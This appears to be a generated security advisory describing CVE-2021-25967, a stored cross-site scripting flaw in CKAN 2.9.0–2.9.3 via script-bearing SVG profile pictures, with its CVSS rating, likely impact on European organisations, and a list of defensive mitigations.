CVE-2021-25967 is a stored Cross-site Scripting (XSS) vulnerability affecting CKAN versions 2.9.0 through 2.9.3. CKAN is an open-source data management system widely used for publishing and sharing datasets. The vulnerability arises from insufficient sanitization of SVG files uploaded as users' profile pictures. Specifically, low-privileged users can upload malicious SVG images containing embedded scripts. When other users or administrators view the profile picture, the malicious script executes in their browsers, leading to potential session hijacking, credential theft, or unauthorized actions within the CKAN web application context. The vulnerability requires the attacker to have an authenticated account with the ability to upload profile pictures, and the victim must interact with the malicious profile image for exploitation to occur. The CVSS v3.1 base score is 5.4 (medium severity), reflecting network attack vector, low attack complexity, low privileges required, but requiring user interaction and resulting in limited confidentiality and integrity impact without affecting availability. No known public exploits have been reported. The vulnerability is categorized under CWE-79, indicating improper neutralization of input leading to XSS. The scope is changed (S:C), meaning the vulnerability affects components beyond the vulnerable component itself, potentially impacting other users. No official patches are linked in the provided data, but remediation typically involves sanitizing SVG uploads to remove scripts or disabling SVG uploads altogether. This vulnerability can be leveraged to conduct targeted attacks within organizations using CKAN, especially those with collaborative data sharing environments.

For European organizations utilizing CKAN versions 2.9.0 to 2.9.3, this vulnerability poses a risk of client-side code execution within trusted environments. Attackers with low privileges can embed malicious scripts in profile pictures, which execute in the browsers of other users, potentially leading to session hijacking, data theft, or privilege escalation within the application. This can compromise the confidentiality and integrity of sensitive datasets managed via CKAN portals. Given CKAN's use in government, research institutions, and open data portals across Europe, exploitation could undermine trust in data integrity and availability. While availability is not directly impacted, the breach of confidentiality and integrity could lead to reputational damage, regulatory non-compliance (e.g., GDPR), and operational disruptions. The requirement for user interaction (viewing the malicious profile picture) limits automated exploitation but does not eliminate risk, especially in environments with frequent user collaboration and profile browsing. The medium CVSS score reflects these factors, but the impact can be significant in high-value data contexts.

1. Immediately upgrade CKAN installations to versions beyond 2.9.3 where this vulnerability is patched or apply vendor-provided patches if available. 2. Implement strict server-side sanitization of SVG files to remove any embedded scripts or disallow SVG uploads entirely if not essential. 3. Enforce Content Security Policy (CSP) headers to restrict script execution origins and mitigate impact of injected scripts. 4. Conduct regular audits of user-uploaded profile pictures to detect and remove potentially malicious SVG files. 5. Limit profile picture upload permissions to trusted users or administrators where feasible. 6. Educate users to be cautious when viewing profile pictures and report suspicious behavior. 7. Monitor web application logs for unusual activity indicative of XSS exploitation attempts. 8. Consider deploying web application firewalls (WAF) with rules targeting XSS payloads in SVG uploads. 9. Review and tighten user privilege assignments to minimize low-privileged users’ ability to upload files. These measures combined reduce the attack surface and mitigate exploitation risk beyond generic advice.